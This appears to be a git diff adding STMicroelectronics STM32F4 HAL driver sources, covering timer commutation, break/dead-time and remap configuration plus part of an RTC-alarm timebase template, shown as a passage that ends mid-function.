assert_param(IS_TIM_COMMUTATION_EVENT_INSTANCE(htim->Instance)); + assert_param(IS_TIM_INTERNAL_TRIGGEREVENT_SELECTION(InputTrigger)); + + __HAL_LOCK(htim); + + if ((InputTrigger == TIM_TS_ITR0) || (InputTrigger == TIM_TS_ITR1) || + (InputTrigger == TIM_TS_ITR2) || (InputTrigger == TIM_TS_ITR3)) + { + /* Select the Input trigger */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= InputTrigger; + } + + /* Select the Capture Compare preload feature */ + htim->Instance->CR2 |= TIM_CR2_CCPC; + /* Select the Commutation event source */ + htim->Instance->CR2 &= ~TIM_CR2_CCUS; + htim->Instance->CR2 |= CommutationSource; + + /* Disable Commutation Interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_COM); + + /* Disable Commutation DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_COM); + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configure the TIM commutation event sequence with interrupt. + * @note This function is mandatory to use the commutation event in order to + * update the configuration at each commutation detection on the TRGI input of the Timer, + * the typical use of this feature is with the use of another Timer(interface Timer) + * configured in Hall sensor interface, this interface Timer will generate the + * commutation at its TRGO output (connected to Timer used in this function) each time + * the TI1 of the Interface Timer detect a commutation at its input TI1. + * @param htim TIM handle + * @param InputTrigger the Internal trigger corresponding to the Timer Interfacing with the Hall sensor + * This parameter can be one of the following values: + * @arg TIM_TS_ITR0: Internal trigger 0 selected + * @arg TIM_TS_ITR1: Internal trigger 1 selected + * @arg TIM_TS_ITR2: Internal trigger 2 selected + * @arg TIM_TS_ITR3: Internal trigger 3 selected + * @arg TIM_TS_NONE: No trigger is needed + * @param CommutationSource the Commutation Event source + * This parameter can be one of the following values: + * @arg TIM_COMMUTATION_TRGI: Commutation source is the TRGI of the Interface Timer + * @arg TIM_COMMUTATION_SOFTWARE: Commutation source is set by software using the COMG bit + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_ConfigCommutEvent_IT(TIM_HandleTypeDef *htim, uint32_t InputTrigger, + uint32_t CommutationSource) +{ + /* Check the parameters */ + assert_param(IS_TIM_COMMUTATION_EVENT_INSTANCE(htim->Instance)); + assert_param(IS_TIM_INTERNAL_TRIGGEREVENT_SELECTION(InputTrigger)); + + __HAL_LOCK(htim); + + if ((InputTrigger == TIM_TS_ITR0) || (InputTrigger == TIM_TS_ITR1) || + (InputTrigger == TIM_TS_ITR2) || (InputTrigger == TIM_TS_ITR3)) + { + /* Select the Input trigger */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= InputTrigger; + } + + /* Select the Capture Compare preload feature */ + htim->Instance->CR2 |= TIM_CR2_CCPC; + /* Select the Commutation event source */ + htim->Instance->CR2 &= ~TIM_CR2_CCUS; + htim->Instance->CR2 |= CommutationSource; + + /* Disable Commutation DMA request */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_COM); + + /* Enable the Commutation Interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_COM); + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configure the TIM commutation event sequence with DMA. + * @note This function is mandatory to use the commutation event in order to + * update the configuration at each commutation detection on the TRGI input of the Timer, + * the typical use of this feature is with the use of another Timer(interface Timer) + * configured in Hall sensor interface, this interface Timer will generate the + * commutation at its TRGO output (connected to Timer used in this function) each time + * the TI1 of the Interface Timer detect a commutation at its input TI1. + * @note The user should configure the DMA in his own software, in This function only the COMDE bit is set + * @param htim TIM handle + * @param InputTrigger the Internal trigger corresponding to the Timer Interfacing with the Hall sensor + * This parameter can be one of the following values: + * @arg TIM_TS_ITR0: Internal trigger 0 selected + * @arg TIM_TS_ITR1: Internal trigger 1 selected + * @arg TIM_TS_ITR2: Internal trigger 2 selected + * @arg TIM_TS_ITR3: Internal trigger 3 selected + * @arg TIM_TS_NONE: No trigger is needed + * @param CommutationSource the Commutation Event source + * This parameter can be one of the following values: + * @arg TIM_COMMUTATION_TRGI: Commutation source is the TRGI of the Interface Timer + * @arg TIM_COMMUTATION_SOFTWARE: Commutation source is set by software using the COMG bit + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_ConfigCommutEvent_DMA(TIM_HandleTypeDef *htim, uint32_t InputTrigger, + uint32_t CommutationSource) +{ + /* Check the parameters */ + assert_param(IS_TIM_COMMUTATION_EVENT_INSTANCE(htim->Instance)); + assert_param(IS_TIM_INTERNAL_TRIGGEREVENT_SELECTION(InputTrigger)); + + __HAL_LOCK(htim); + + if ((InputTrigger == TIM_TS_ITR0) || (InputTrigger == TIM_TS_ITR1) || + (InputTrigger == TIM_TS_ITR2) || (InputTrigger == TIM_TS_ITR3)) + { + /* Select the Input trigger */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= InputTrigger; + } + + /* Select the Capture Compare preload feature */ + htim->Instance->CR2 |= TIM_CR2_CCPC; + /* Select the Commutation event source */ + htim->Instance->CR2 &= ~TIM_CR2_CCUS; + htim->Instance->CR2 |= CommutationSource; + + /* Enable the Commutation DMA Request */ + /* Set the DMA Commutation Callback */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferCpltCallback = TIMEx_DMACommutationCplt; + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferHalfCpltCallback = TIMEx_DMACommutationHalfCplt; + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_COMMUTATION]->XferErrorCallback = TIM_DMAError; + + /* Disable Commutation Interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_COM); + + /* Enable the Commutation DMA Request */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_COM); + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configures the TIM in master mode. + * @param htim TIM handle. + * @param sMasterConfig pointer to a TIM_MasterConfigTypeDef structure that + * contains the selected trigger output (TRGO) and the Master/Slave + * mode. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_MasterConfigSynchronization(TIM_HandleTypeDef *htim, + TIM_MasterConfigTypeDef *sMasterConfig) +{ + uint32_t tmpcr2; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_MASTER_INSTANCE(htim->Instance)); + assert_param(IS_TIM_TRGO_SOURCE(sMasterConfig->MasterOutputTrigger)); + assert_param(IS_TIM_MSM_STATE(sMasterConfig->MasterSlaveMode)); + + /* Check input state */ + __HAL_LOCK(htim); + + /* Change the handler state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Get the TIMx CR2 register value */ + tmpcr2 = htim->Instance->CR2; + + /* Get the TIMx SMCR register value */ + tmpsmcr = htim->Instance->SMCR; + + /* Reset the MMS Bits */ + tmpcr2 &= ~TIM_CR2_MMS; + /* Select the TRGO source */ + tmpcr2 |= sMasterConfig->MasterOutputTrigger; + + /* Update TIMx CR2 */ + htim->Instance->CR2 = tmpcr2; + + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + /* Reset the MSM Bit */ + tmpsmcr &= ~TIM_SMCR_MSM; + /* Set master mode */ + tmpsmcr |= sMasterConfig->MasterSlaveMode; + + /* Update TIMx SMCR */ + htim->Instance->SMCR = tmpsmcr; + } + + /* Change the htim state */ + htim->State = HAL_TIM_STATE_READY; + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configures the Break feature, dead time, Lock level, OSSI/OSSR State + * and the AOE(automatic output enable). + * @param htim TIM handle + * @param sBreakDeadTimeConfig pointer to a TIM_ConfigBreakDeadConfigTypeDef structure that + * contains the BDTR Register configuration information for the TIM peripheral. + * @note Interrupts can be generated when an active level is detected on the + * break input, the break 2 input or the system break input. Break + * interrupt can be enabled by calling the @ref __HAL_TIM_ENABLE_IT macro. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_ConfigBreakDeadTime(TIM_HandleTypeDef *htim, + TIM_BreakDeadTimeConfigTypeDef *sBreakDeadTimeConfig) +{ + /* Keep this variable initialized to 0 as it is used to configure BDTR register */ + uint32_t tmpbdtr = 0U; + + /* Check the parameters */ + assert_param(IS_TIM_BREAK_INSTANCE(htim->Instance)); + assert_param(IS_TIM_OSSR_STATE(sBreakDeadTimeConfig->OffStateRunMode)); + assert_param(IS_TIM_OSSI_STATE(sBreakDeadTimeConfig->OffStateIDLEMode)); + assert_param(IS_TIM_LOCK_LEVEL(sBreakDeadTimeConfig->LockLevel)); + assert_param(IS_TIM_DEADTIME(sBreakDeadTimeConfig->DeadTime)); + assert_param(IS_TIM_BREAK_STATE(sBreakDeadTimeConfig->BreakState)); + assert_param(IS_TIM_BREAK_POLARITY(sBreakDeadTimeConfig->BreakPolarity)); + assert_param(IS_TIM_AUTOMATIC_OUTPUT_STATE(sBreakDeadTimeConfig->AutomaticOutput)); + + /* Check input state */ + __HAL_LOCK(htim); + + /* Set the Lock level, the Break enable Bit and the Polarity, the OSSR State, + the OSSI State, the dead time value and the Automatic Output Enable Bit */ + + /* Set the BDTR bits */ + MODIFY_REG(tmpbdtr, TIM_BDTR_DTG, sBreakDeadTimeConfig->DeadTime); + MODIFY_REG(tmpbdtr, TIM_BDTR_LOCK, sBreakDeadTimeConfig->LockLevel); + MODIFY_REG(tmpbdtr, TIM_BDTR_OSSI, sBreakDeadTimeConfig->OffStateIDLEMode); + MODIFY_REG(tmpbdtr, TIM_BDTR_OSSR, sBreakDeadTimeConfig->OffStateRunMode); + MODIFY_REG(tmpbdtr, TIM_BDTR_BKE, sBreakDeadTimeConfig->BreakState); + MODIFY_REG(tmpbdtr, TIM_BDTR_BKP, sBreakDeadTimeConfig->BreakPolarity); + MODIFY_REG(tmpbdtr, TIM_BDTR_AOE, sBreakDeadTimeConfig->AutomaticOutput); + + + /* Set TIMx_BDTR */ + htim->Instance->BDTR = tmpbdtr; + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Configures the TIMx Remapping input capabilities. + * @param htim TIM handle. + * @param Remap specifies the TIM remapping source. + * For TIM1, the parameter can have the following values: (**) + * @arg TIM_TIM1_TIM3_TRGO: TIM1 ITR2 is connected to TIM3 TRGO + * @arg TIM_TIM1_LPTIM: TIM1 ITR2 is connected to LPTIM1 output + * + * For TIM2, the parameter can have the following values: (**) + * @arg TIM_TIM2_TIM8_TRGO: TIM2 ITR1 is connected to TIM8 TRGO (*) + * @arg TIM_TIM2_ETH_PTP: TIM2 ITR1 is connected to PTP trigger output (*) + * @arg TIM_TIM2_USBFS_SOF: TIM2 ITR1 is connected to OTG FS SOF + * @arg TIM_TIM2_USBHS_SOF: TIM2 ITR1 is connected to OTG FS SOF + * + * For TIM5, the parameter can have the following values: + * @arg TIM_TIM5_GPIO: TIM5 TI4 is connected to GPIO + * @arg TIM_TIM5_LSI: TIM5 TI4 is connected to LSI + * @arg TIM_TIM5_LSE: TIM5 TI4 is connected to LSE + * @arg TIM_TIM5_RTC: TIM5 TI4 is connected to the RTC wakeup interrupt + * @arg TIM_TIM5_TIM3_TRGO: TIM5 ITR1 is connected to TIM3 TRGO (*) + * @arg TIM_TIM5_LPTIM: TIM5 ITR1 is connected to LPTIM1 output (*) + * + * For TIM9, the parameter can have the following values: (**) + * @arg TIM_TIM9_TIM3_TRGO: TIM9 ITR1 is connected to TIM3 TRGO + * @arg TIM_TIM9_LPTIM: TIM9 ITR1 is connected to LPTIM1 output + * + * For TIM11, the parameter can have the following values: + * @arg TIM_TIM11_GPIO: TIM11 TI1 is connected to GPIO + * @arg TIM_TIM11_HSE: TIM11 TI1 is connected to HSE_RTC clock + * @arg TIM_TIM11_SPDIFRX: TIM11 TI1 is connected to SPDIFRX_FRAME_SYNC (*) + * + * (*) Value not defined in all devices. \n + * (**) Register not available in all devices. + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_RemapConfig(TIM_HandleTypeDef *htim, uint32_t Remap) +{ + __HAL_LOCK(htim); + + /* Check parameters */ + assert_param(IS_TIM_REMAP(htim->Instance, Remap)); + +#if defined(LPTIM_OR_TIM1_ITR2_RMP) && defined(LPTIM_OR_TIM5_ITR1_RMP) && defined(LPTIM_OR_TIM9_ITR1_RMP) + if ((Remap & LPTIM_REMAP_MASK) == LPTIM_REMAP_MASK) + { + /* Connect TIMx internal trigger to LPTIM1 output */ + __HAL_RCC_LPTIM1_CLK_ENABLE(); + MODIFY_REG(LPTIM1->OR, + (LPTIM_OR_TIM1_ITR2_RMP | LPTIM_OR_TIM5_ITR1_RMP | LPTIM_OR_TIM9_ITR1_RMP), + Remap & ~(LPTIM_REMAP_MASK)); + } + else + { + /* Set the Timer remapping configuration */ + WRITE_REG(htim->Instance->OR, Remap); + } +#else + /* Set the Timer remapping configuration */ + WRITE_REG(htim->Instance->OR, Remap); +#endif /* LPTIM_OR_TIM1_ITR2_RMP && LPTIM_OR_TIM5_ITR1_RMP && LPTIM_OR_TIM9_ITR1_RMP */ + + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group6 Extended Callbacks functions + * @brief Extended Callbacks functions + * +@verbatim + ============================================================================== + ##### Extended Callbacks functions ##### + ============================================================================== + [..] + This section provides Extended TIM callback functions: + (+) Timer Commutation callback + (+) Timer Break callback + +@endverbatim + * @{ + */ + +/** + * @brief Hall commutation changed callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIMEx_CommutCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIMEx_CommutCallback could be implemented in the user file + */ +} +/** + * @brief Hall commutation changed half complete callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIMEx_CommutHalfCpltCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIMEx_CommutHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Hall Break detection callback in non-blocking mode + * @param htim TIM handle + * @retval None + */ +__weak void HAL_TIMEx_BreakCallback(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIMEx_BreakCallback could be implemented in the user file + */ +} +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group7 Extended Peripheral State functions + * @brief Extended Peripheral State functions + * +@verbatim + ============================================================================== + ##### Extended Peripheral State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the TIM Hall Sensor interface handle state. + * @param htim TIM Hall Sensor handle + * @retval HAL state + */ +HAL_TIM_StateTypeDef HAL_TIMEx_HallSensor_GetState(TIM_HandleTypeDef *htim) +{ + return htim->State; +} + +/** + * @brief Return actual state of the TIM complementary channel. + * @param htim TIM handle + * @param ChannelN TIM Complementary channel + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 + * @arg TIM_CHANNEL_2: TIM Channel 2 + * @arg TIM_CHANNEL_3: TIM Channel 3 + * @retval TIM Complementary channel state + */ +HAL_TIM_ChannelStateTypeDef HAL_TIMEx_GetChannelNState(TIM_HandleTypeDef *htim, uint32_t ChannelN) +{ + HAL_TIM_ChannelStateTypeDef channel_state; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, ChannelN)); + + channel_state = TIM_CHANNEL_N_STATE_GET(htim, ChannelN); + + return channel_state; +} +/** + * @} + */ + +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/** @defgroup TIMEx_Private_Functions TIMEx Private Functions + * @{ + */ + +/** + * @brief TIM DMA Commutation callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIMEx_DMACommutationCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Change the htim state */ + htim->State = HAL_TIM_STATE_READY; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->CommutationCallback(htim); +#else + HAL_TIMEx_CommutCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + +/** + * @brief TIM DMA Commutation half complete callback. + * @param hdma pointer to DMA handle. + * @retval None + */ +void TIMEx_DMACommutationHalfCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Change the htim state */ + htim->State = HAL_TIM_STATE_READY; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->CommutationHalfCpltCallback(htim); +#else + HAL_TIMEx_CommutHalfCpltCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ +} + + +/** + * @brief TIM DMA Delay Pulse complete callback (complementary channel). + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMADelayPulseNCplt(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + } + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC4]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_4; + + if (hdma->Init.Mode == DMA_NORMAL) + { + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_4, HAL_TIM_CHANNEL_STATE_READY); + } + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->PWM_PulseFinishedCallback(htim); +#else + HAL_TIM_PWM_PulseFinishedCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief TIM DMA error callback (complementary channel) + * @param hdma pointer to DMA handle. + * @retval None + */ +static void TIM_DMAErrorCCxN(DMA_HandleTypeDef *hdma) +{ + TIM_HandleTypeDef *htim = (TIM_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hdma == htim->hdma[TIM_DMA_ID_CC1]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_1; + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC2]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_2; + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + } + else if (hdma == htim->hdma[TIM_DMA_ID_CC3]) + { + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_3; + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_3, HAL_TIM_CHANNEL_STATE_READY); + } + else + { + /* nothing to do */ + } + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + htim->ErrorCallback(htim); +#else + HAL_TIM_ErrorCallback(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + htim->Channel = HAL_TIM_ACTIVE_CHANNEL_CLEARED; +} + +/** + * @brief Enables or disables the TIM Capture Compare Channel xN. + * @param TIMx to select the TIM peripheral + * @param Channel specifies the TIM Channel + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 + * @arg TIM_CHANNEL_2: TIM Channel 2 + * @arg TIM_CHANNEL_3: TIM Channel 3 + * @param ChannelNState specifies the TIM Channel CCxNE bit new state. + * This parameter can be: TIM_CCxN_ENABLE or TIM_CCxN_Disable. + * @retval None + */ +static void TIM_CCxNChannelCmd(TIM_TypeDef *TIMx, uint32_t Channel, uint32_t ChannelNState) +{ + uint32_t tmp; + + tmp = TIM_CCER_CC1NE << (Channel & 0x1FU); /* 0x1FU = 31 bits max shift */ + + /* Reset the CCxNE Bit */ + TIMx->CCER &= ~tmp; + + /* Set or reset the CCxNE Bit */ + TIMx->CCER |= (uint32_t)(ChannelNState << (Channel & 0x1FU)); /* 0x1FU = 31 bits max shift */ +} +/** + * @} + */ + +#endif /* HAL_TIM_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_alarm_template.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_alarm_template.c new file mode 100644 index 000000000..ddd78a529 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_timebase_rtc_alarm_template.c @@ -0,0 +1,317 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_timebase_rtc_alarm_template.c + * @author MCD Application Team + * @brief HAL time base based on the hardware RTC_ALARM Template. + * + * This file override the native HAL time base functions (defined as weak) + * to use the RTC ALARM for time base generation: + * + Intializes the RTC peripheral to increment the seconds registers each 1ms + * + The alarm is configured to assert an interrupt when the RTC reaches 1ms + * + HAL_IncTick is called at each Alarm event and the time is reset to 00:00:00 + * + HSE (default), LSE or LSI can be selected as RTC clock source + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This file must be copied to the application folder and modified as follows: + (#) Rename it to 'stm32f4xx_hal_timebase_rtc_alarm.c' + (#) Add this file and the RTC HAL drivers to your project and uncomment + HAL_RTC_MODULE_ENABLED define in stm32f4xx_hal_conf.h + + [..] + (@) HAL RTC alarm and HAL RTC wakeup drivers cant be used with low power modes: + The wake up capability of the RTC may be intrusive in case of prior low power mode + configuration requiring different wake up sources. + Application/Example behavior is no more guaranteed + (@) The stm32f4xx_hal_timebase_tim use is recommended for the Applications/Examples + requiring low power modes + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup HAL_TimeBase_RTC_Alarm_Template HAL TimeBase RTC Alarm Template + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ + +/* Uncomment the line below to select the appropriate RTC Clock source for your application: + + RTC_CLOCK_SOURCE_HSE: can be selected for applications requiring timing precision. + + RTC_CLOCK_SOURCE_LSE: can be selected for applications with low constraint on timing + precision. + + RTC_CLOCK_SOURCE_LSI: can be selected for applications with low constraint on timing + precision. + */ +#define RTC_CLOCK_SOURCE_HSE +/* #define RTC_CLOCK_SOURCE_LSE */ +/* #define RTC_CLOCK_SOURCE_LSI */ + +#ifdef RTC_CLOCK_SOURCE_HSE + #define RTC_ASYNCH_PREDIV 99U + #define RTC_SYNCH_PREDIV 9U + #define RCC_RTCCLKSOURCE_1MHZ ((uint32_t)((uint32_t)RCC_BDCR_RTCSEL | (uint32_t)((HSE_VALUE/1000000U) << 16U))) +#else /* RTC_CLOCK_SOURCE_LSE || RTC_CLOCK_SOURCE_LSI */ + #define RTC_ASYNCH_PREDIV 0U + #define RTC_SYNCH_PREDIV 31U +#endif /* RTC_CLOCK_SOURCE_HSE */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +RTC_HandleTypeDef hRTC_Handle; +/* Private function prototypes -----------------------------------------------*/ +void RTC_Alarm_IRQHandler(void); +/* Private functions ---------------------------------------------------------*/ + +/** + * @brief This function configures the RTC_ALARMA as a time base source. + * The time source is configured to have 1ms time base with a dedicated + * Tick interrupt priority. + * @note This function is called automatically at the beginning of program after + * reset by HAL_Init() or at any time when clock is configured, by HAL_RCC_ClockConfig(). + * @param TickPriority Tick interrupt priority. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_InitTick(uint32_t TickPriority) +{ + __IO uint32_t counter = 0U; + + RCC_OscInitTypeDef RCC_OscInitStruct; + RCC_PeriphCLKInitTypeDef PeriphClkInitStruct; + HAL_StatusTypeDef status; + +#ifdef RTC_CLOCK_SOURCE_LSE + /* Configue LSE as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSE; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.LSEState = RCC_LSE_ON; + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_LSE; +#elif defined (RTC_CLOCK_SOURCE_LSI) + /* Configue LSI as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSI; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.LSIState = RCC_LSI_ON; + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_LSI; +#elif defined (RTC_CLOCK_SOURCE_HSE) + /* Configue HSE as RTC clock soucre */ + RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSE; + RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE; + RCC_OscInitStruct.HSEState = RCC_HSE_ON; + /* Ensure that RTC is clocked by 1MHz */ + PeriphClkInitStruct.RTCClockSelection = RCC_RTCCLKSOURCE_1MHZ; +#else +#error Please select the RTC Clock source +#endif /* RTC_CLOCK_SOURCE_LSE */ + + status = HAL_RCC_OscConfig(&RCC_OscInitStruct); + if (status == HAL_OK) + { + PeriphClkInitStruct.PeriphClockSelection = RCC_PERIPHCLK_RTC; + status = HAL_RCCEx_PeriphCLKConfig(&PeriphClkInitStruct); + } + if (status == HAL_OK) + { + /* Enable RTC Clock */ + __HAL_RCC_RTC_ENABLE(); + /* The time base should be 1ms + Time base = ((RTC_ASYNCH_PREDIV + 1) * (RTC_SYNCH_PREDIV + 1)) / RTC_CLOCK + HSE as RTC clock + Time base = ((99 + 1) * (9 + 1)) / 1MHz + = 1ms + LSE as RTC clock + Time base = ((31 + 1) * (0 + 1)) / 32.768KHz + = ~1ms + LSI as RTC clock + Time base = ((31 + 1) * (0 + 1)) / 32KHz + = 1ms + */ + hRTC_Handle.Instance = RTC; + hRTC_Handle.Init.HourFormat = RTC_HOURFORMAT_24; + hRTC_Handle.Init.AsynchPrediv = RTC_ASYNCH_PREDIV; + hRTC_Handle.Init.SynchPrediv = RTC_SYNCH_PREDIV; + hRTC_Handle.Init.OutPut = RTC_OUTPUT_DISABLE; + hRTC_Handle.Init.OutPutPolarity = RTC_OUTPUT_POLARITY_HIGH; + hRTC_Handle.Init.OutPutType = RTC_OUTPUT_TYPE_OPENDRAIN; + status = HAL_RTC_Init(&hRTC_Handle); + } + if (status == HAL_OK) + { + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(&hRTC_Handle); + + /* Disable the Alarm A interrupt */ + __HAL_RTC_ALARMA_DISABLE(&hRTC_Handle); + + /* Clear flag alarm A */ + __HAL_RTC_ALARM_CLEAR_FLAG(&hRTC_Handle, RTC_FLAG_ALRAF); + + counter = 0U; + /* Wait till RTC ALRAWF flag is set and if Time out is reached exit */ + while (__HAL_RTC_ALARM_GET_FLAG(&hRTC_Handle, RTC_FLAG_ALRAWF) == RESET) + { + if (counter++ == (SystemCoreClock / 48U)) /* Timeout = ~ 1s */ + { + status = HAL_ERROR; + } + } + } + if (status == HAL_OK) + { + hRTC_Handle.Instance->ALRMAR = (uint32_t)0x01U; + + /* Configure the Alarm state: Enable Alarm */ + __HAL_RTC_ALARMA_ENABLE(&hRTC_Handle); + /* Configure the Alarm interrupt */ + __HAL_RTC_ALARM_ENABLE_IT(&hRTC_Handle, RTC_IT_ALRA); + + /* RTC Alarm Interrupt Configuration: EXTI configuration */ + __HAL_RTC_ALARM_EXTI_ENABLE_IT(); + __HAL_RTC_ALARM_EXTI_ENABLE_RISING_EDGE(); + + /* Check if the Initialization mode is set */ + if ((hRTC_Handle.Instance->ISR & RTC_ISR_INITF) == (uint32_t)RESET) + { + /* Set the Initialization mode */ + hRTC_Handle.Instance->ISR = (uint32_t)RTC_INIT_MASK; + counter = 0U; + while ((hRTC_Handle.Instance->ISR & RTC_ISR_INITF) == (uint32_t)RESET) + { + if (counter++ == (SystemCoreClock / 48U)) /* Timeout = ~ 1s */ + { + status = HAL_ERROR; + } + } + } + } + if (status == HAL_OK) + { + hRTC_Handle.Instance->DR = 0U; + hRTC_Handle.Instance->TR = 0U; + + hRTC_Handle.Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + + /* Enable the write protection for RTC registers */ 